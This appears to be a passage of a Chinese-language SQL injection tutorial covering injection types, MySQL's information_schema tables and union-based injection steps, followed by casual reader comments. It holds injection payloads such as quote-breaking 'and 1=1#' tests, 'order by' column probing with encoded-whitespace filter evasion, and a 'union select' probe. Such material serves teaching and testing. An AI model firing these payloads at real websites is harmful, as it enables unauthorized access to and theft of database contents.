| 注入技术 | 特征 |
|---|---|
| 布尔型盲注 | 根据返回页面判断条件真假 |
| 时间型盲注 | 用页面返回时间是否增加判断是否存在注入 |
| 基于错误的注入 | 页面会返回错误信息 |
| 联合查询注入 | 可以使用union的情况下 |
| 堆查询注入 | 可以同时执行多条语句 |
MySQL默认存在数据库
sys
mysql
performance_schema
information_schema
information_schema 存放着所有的数据库信息(5.0版本以上才有这个库)
这个库默认存在三个表:
| 表名 | 字段 |
|---|---|
| SCHEMATA 存放用户创建的所有数据库库名 | SCHEMA_NAME 记录数据库库名 |
| TABLES 存放用户创建的所有数据库库名和表名 | TABLE_SCHEMA 记录数据库名 TABLE_NAME 记录表名 |
| COLUMNS 存放用户创建的数据库库名、表名和字段名 | TABLE_SCHEMA 记录数据库名 TABLE_NAME 记录表名 COLUMN_NAME 记录字段名 |
联合查询注入
1)单引号报错
在参数后添加引号尝试报错,并用 and 1=1# 和 and 1=2# 测试报错
?id=1' and 1=1# --页面返回正常
?id=1' and 1=2# --页面返回不正常
2)利用 order by 猜字段
?id=1%27%20order%0aby%0c2%23 --返回正常
?id=1%27 order by 3# --返回正常
?id=1%27 order by 4# --返回正常
?id=1%27 order by 5# --返回错误,这就证明字段总数为43)利用union联合查询
?id=-1%27 union select 1,2,3,4#
--看哪个字段可以显示信息,利用它获取数据库信息
我是黄中专
@ 2991722584
丁中专别说话了
@ 2991722584
人机
i love linking very much!!!
@ 2991722584
6666
@ 2991722584 你好,生活愉快
@ J
你好 生活愉快